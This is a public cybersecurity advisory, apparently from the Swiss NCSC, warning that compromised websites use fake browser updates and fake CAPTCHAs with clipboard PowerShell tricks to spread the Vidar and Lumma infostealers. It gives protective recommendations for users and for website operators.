Week 45: How attackers try to spread malware using fraudulent CAPTCHAs and supposed updates

12.11.2024 - Over the past week, the NCSC has received an increasing number of reports about websites that are compromised in order to make visitors believe that the browser needs to be updated or a CAPTCHA needs to be solved. The aim is to infect website visitors' devices with malware.

The current approach involves hacking web servers and manipulating websites in such a way that they entice a victim to install malware. The attackers usually gain access to the web servers using stolen access data. Malicious JavaScript blocks are then injected, redirects are placed or fake plugins are installed in the CMS. The following two examples show the methods used by the attackers:

Bogus browser updates

Figure 1: Request to update an allegedly outdated version of Google Chrome.
Figure 1: Request to update an allegedly outdated version of Google Chrome.

The importance of installing updates is generally recognised; so much so that attackers are now specifically exploiting this to surreptitiously install malware. The infection attempt starts as soon as visitors access the compromised website. During the process, a malicious JavaScript code or malicious plugin is executed and the visitor is redirected to a fake update page. They are then instructed to install the malware, disguised as a Google Chrome browser update, for example, on their computer. The malware is an ‘infostealer’ such as ‘Vidar Stealer’. Vidar collects information about the operating system, account login information, credit card details or browsing history. However, the malware not only collects sensitive data, but can also be used as a downloader for other malware.

Fake CAPTCHAs and a Powershell script

Figure 2: Fraudulent request to solve a CAPTCHA
Figure 2: Fraudulent request to solve a CAPTCHA

Many people are familiar with the request on internet forms to confirm that they are a human being and not a robot. In these tests, known as CAPTCHAs, they may, for example, be asked to solve a maths problem or select where animals, cars, bridges, etc. are shown in a series of pictures. However, CAPTCHAs can also be exploited by attackers: website visitors are lured to a false CAPTCHA page, often via compromised legitimate providers or publicly accessible CAPTCHA services. In these cases, clicking the ‘I am not a robot’ button copies a malicious PowerShell script to the user's clipboard. A PowerShell script is a text file that contains commands that a computer is supposed to execute. Users are tricked into inserting and executing this script by pressing the Windows key + R and then Ctrl + V. The computer then connects to one of the attackers' servers and malware is downloaded and installed. The NCSC has been informed that an infostealer known as ‘Lumma Stealer’ is being distributed in this way. Lumma Stealer targets web browsers, cryptocurrency wallets, 2-factor authentication extensions and instant messaging services such as Telegram to extract valuable data. Like the Vidar Stealer, the malware is also capable of installing additional malware and executing further commands.

Recommendations for internet users

  • be careful when installing programmes. Only download programmes from secure and trustworthy sources;
  • be careful if a pop-up window appears asking you to update your browser or software;
  • be careful with unusual CAPTCHAs;
  • close any window with a potentially harmful pop-up or CAPTCHA;
  • follow the official update guidelines from the browser manufacturer;
  • if you suspect that your computer is infected with malware, contact a specialist or a computer shop;
  • many malware programmes make extensive changes to the system that cannot simply be undone. If an infection is confirmed, the entire system should therefore be reinstalled. Regular backups make it easier to restore your data;
  • change your passwords for all online accesses (email, social networks, etc.) after reinstallation.

Recommendations for operators of websites

  • check your website for security gaps and make sure that nobody has unauthorised access;
  • activate two-factor authentication for access to your website;
  • clean up your website and remove any unwanted content;
  • regularly update and check your website and the installed plugins;
  • in particular, install available updates for CMS systems and all other software applications as quickly as possible in order to close any potential security gaps immediately.
https://www.ncsc.admin.ch/content/ncsc/en/home/aktuell/im-fokus/2024/wochenrueckblick_45.html